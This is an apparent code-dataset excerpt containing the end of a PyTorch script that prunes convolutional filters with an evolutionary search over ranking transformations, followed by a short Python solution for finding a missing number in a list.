cur_size = self.pruner.cur_size
self.pruner.model = self.pruner.model.to(self.device)
print('Density: {:.3f}% ({:.3f}M/{:.3f}M) | FLOPs: {:.3f}% ({:.3f}M/{:.3f}M)'.format(float(cur_size)/original_size*100, cur_size/1e6, original_size/1e6,
float(cur_flops)/original_flops*100, cur_flops/1e6, original_flops/1e6))
print('Fine tuning to recover from pruning iteration.')
optimizer = optim.SGD(self.pruner.model.parameters(), lr=self.lr, momentum=0.9, weight_decay=5e-4)
if tau_hat > 0:
train(self.model, self.train_loader, self.val_loader, optimizer, epochs=1, steps=tau_hat, run_test=False, device=self.device)
acc, loss = test(self.model, self.val_loader, device=self.device, get_loss=True)
if np.mean(loss) < minimum_loss:
minimum_loss = np.mean(loss)
best_perturbation = perturbation
if i < POPULATIONS:
index_queue.put(i)
population_data.append(perturbation)
population_loss = np.append(population_loss, [np.mean(loss)])
else:
index_queue.put(oldest_index)
population_data[oldest_index] = perturbation
population_loss[oldest_index] = np.mean(loss)
# Restore the model back to origin
model = torch.load(model_desc)
if isinstance(model, nn.DataParallel):
model = model.module
model.eval()
model = model.to(self.device)
self.pruner.model = model
self.model = model
self.pruner.reset()
self.pruner.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
print('Generation {}, Step: {:.2f}, Min Loss: {:.3f}'.format(i, step_size, np.min(population_loss)))
total_t = time.time() - start_t
print('Finished. Use {:.2f} hours. Minimum Loss: {:.3f}'.format(float(total_t) / 3600, minimum_loss))
if not os.path.exists('./log'):
os.makedirs('./log')
np.savetxt(os.path.join('./log', '{}_ea_loss.txt'.format(name)), np.array(mean_loss))
np.savetxt(os.path.join('./log', '{}_ea_min.data'.format(name)), best_perturbation)
# Use the best affine transformation to obtain the resulting model
self.pruner.pruning_with_transformations(original_dist, best_perturbation, target)
if not os.path.exists('./ckpt'):
os.makedirs('./ckpt')
torch.save(self.pruner.model, os.path.join('ckpt', '{}_bestarch_init.pt'.format(name)))
def prune(self, name, model_name, long_ft, target=-1):
test_acc = []
b4ft_test_acc = []
density = []
flops = []
# Get the accuracy before pruning
acc = test(self.model, self.test_loader, device=self.device)
test_acc.append(acc)
b4ft_test_acc.append(acc)
self.pruner.reset()
self.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
b4prune_size = self.pruner.cur_size
b4prune_flops = self.pruner.cur_flops
density.append(self.pruner.cur_size)
flops.append(self.pruner.cur_flops)
print('Before Pruning, Acc: {:.2f}%, FLOPs: {:.3f}M, Size: {:.3f}M'.format(acc, b4prune_flops/1e6, b4prune_size/1e6))
# If there is learned affine transformation, load it.
if self.lub != '':
perturbation = np.loadtxt(self.lub)
else:
perturbation = np.array([[1., 0.] for _ in range(len(self.pruner.filter_ranks))])
self.pruner.pruning_with_transformations(self.pruner.filter_ranks, perturbation, target)
self.pruner.reset()
self.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
cur_flops = self.pruner.cur_flops
cur_size = self.pruner.cur_size
density.append(cur_size)
flops.append(cur_flops)
print('Density: {:.3f}% ({:.3f}M/{:.3f}M) | FLOPs: {:.3f}% ({:.3f}M/{:.3f}M)'.format(cur_size/b4prune_size*100, cur_size/1e6, b4prune_size/1e6,
cur_flops/b4prune_flops*100, cur_flops/1e6, b4prune_flops/1e6))
print('Fine tuning to recover from pruning iteration.')
if not os.path.exists('./ckpt'):
os.makedirs('./ckpt')
print('Saving untrained pruned model...')
torch.save(self.pruner.model, os.path.join('ckpt', '{}_init.t7'.format(name)))
acc = test(self.model, self.test_loader, device=self.device)
b4ft_test_acc.append(acc)
if not os.path.exists('./log'):
os.makedirs('./log')
print('Finished. Going to fine tune the model a bit more')
if long_ft > 0:
optimizer = optim.SGD(self.model.parameters(), lr=self.lr, momentum=0.9, weight_decay=5e-4, nesterov=True)
#scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, long_ft)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, [int(long_ft*0.3), int(long_ft*0.6), int(long_ft*0.8)], gamma=0.2)
if args.no_val:
train(self.model, self.train_loader, self.test_loader, optimizer, epochs=long_ft, scheduler=scheduler, device=self.device, name=name)
else:
train(self.model, self.train_loader, self.val_loader, optimizer, epochs=long_ft, scheduler=scheduler, device=self.device, name=name)
acc = test(self.model, self.test_loader, device=self.device)
test_acc.append(acc)
else:
acc = test(self.model, self.test_loader, device=self.device)
test_acc.append(acc)
log = np.stack([np.array(b4ft_test_acc), np.array(test_acc), np.array(density), np.array(flops)], axis=1)
np.savetxt(os.path.join('./log', '{}_test_acc.txt'.format(name)), log)
print('Summary')
print('Before Pruning- Accuracy: {:.3f}, Cost: {:.3f}M'.format(test_acc[0], b4prune_flops/1e6))
print('After Pruning- Accuracy: {:.3f}, Cost: {:.3f}M'.format(test_acc[-1], cur_flops/1e6))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--name", type=str, default='pruned_mbnetv2', help='Name for the experiments, the resulting model and logs will use this')
parser.add_argument("--datapath", type=str, default='./data', help='Path toward the dataset that is used for this experiment')
parser.add_argument("--dataset", type=str, default='torchvision.datasets.CIFAR10', help='The class name of the dataset that is used, please find available classes under the dataset folder')
parser.add_argument("--model", type=str, default='./ckpt/resnet56_cifar10.t7', help='The pre-trained model that pruning starts from')
parser.add_argument("--pruner", type=str, default='FilterPrunerResNet', help='Different network require differnt pruner implementation')
parser.add_argument("--rank_type", type=str, default='l2_weight', help='The ranking criteria for filter pruning')
parser.add_argument("--lub", type=str, default='', help='The affine transformations')
parser.add_argument("--global_random_rank", action='store_true', default=False, help='When this is specified, none of the rank_type matters, it will randomly prune the filters')
parser.add_argument("--tau_hat", type=int, default=0, help='The number of updates before evaluating for fitness (used in EA).')
parser.add_argument("--long_ft", type=int, default=60, help='It specifies how many epochs to fine-tune the network once the pruning is done')
parser.add_argument("--prune_away", type=float, default=90, help='How many percentage of constraints should be pruned away. E.g., 50 means 50% of FLOPs will be pruned away')
parser.add_argument("--safeguard", type=float, default=0, help='A floating point number that represent at least how many percentage of the original number of channel should be preserved. E.g., 0.10 means no matter what ranking, each layer should have at least 10% of the number of original channels.')
parser.add_argument("--batch_size", type=int, default=32, help='Batch size for training.')
parser.add_argument("--min_lub", action='store_true', default=False, help='Use Evolutionary Algorithm to solve latent variable for minimizing Lipschitz upper bound')
parser.add_argument("--uniform_pruning", action='store_true', default=False, help='Use Evolutionary Algorithm to solve latent variable for minimizing Lipschitz upper bound')
parser.add_argument("--no_val", action='store_true', default=False, help='Use full dataset to train (use to compare with prior art in CIFAR-10)')
parser.add_argument("--cpu", action='store_true', default=False, help='Use CPU')
parser.add_argument("--lr", type=float, default=0.001, help='The learning rate for fine-tuning')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = get_args()
print(args)
print('Pruning {}'.format(args.name))
img_size = 32
device = 'cpu' if args.cpu else 'cuda'
prune_till = -1
prune_away = args.prune_away
model = torch.load(args.model)
if isinstance(model, nn.DataParallel):
model = model.module
model = model.to(device)
legr = LeGR(args.dataset, args.datapath, model, args.pruner, args.rank_type, args.batch_size, args.lr, safeguard=args.safeguard, global_random_rank=args.global_random_rank, lub=args.lub, device=device)
if prune_away > 0:
dummy_size = 32 if 'CIFAR' in args.dataset else 224
legr.pruner.reset()
legr.model.eval()
legr.pruner.forward(torch.zeros((1,3,dummy_size, dummy_size), device=device))
b4prune_flops = legr.pruner.cur_flops
prune_till = b4prune_flops * (1-(prune_away)/100.)
print('Pruned untill {:.3f}M'.format(prune_till/1000000.))
if args.uniform_pruning:
ratio = legr.pruner.get_uniform_ratio(prune_till)
legr.pruner.safeguard = ratio
prune_away = 99
if args.min_lub:
legr.learn_ranking_ea(args.name, args.model, args.tau_hat, args.long_ft, (1-(prune_away)/100.))
else:
legr.prune(args.name, args.model, args.long_ft, (1-(prune_away)/100.))
|
challenge_7/python/wost/find_missing_number.py | rchicoli/2017-challenges | 271 | 12653880 | <filename>challenge_7/python/wost/find_missing_number.py
def find_missing_number(c):
b = max(c)
d = min(c + [0]) if min(c) == 1 else min(c)
v = set(range(d, b)) - set(c)
return list(v)[0] if v != set() else None
print(find_missing_number([1, 3, 2, 4]))
print(find_missing_number([0, 2, 3, 4, 5]))
print(find_missing_number([9, 7, 5, 8]))
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.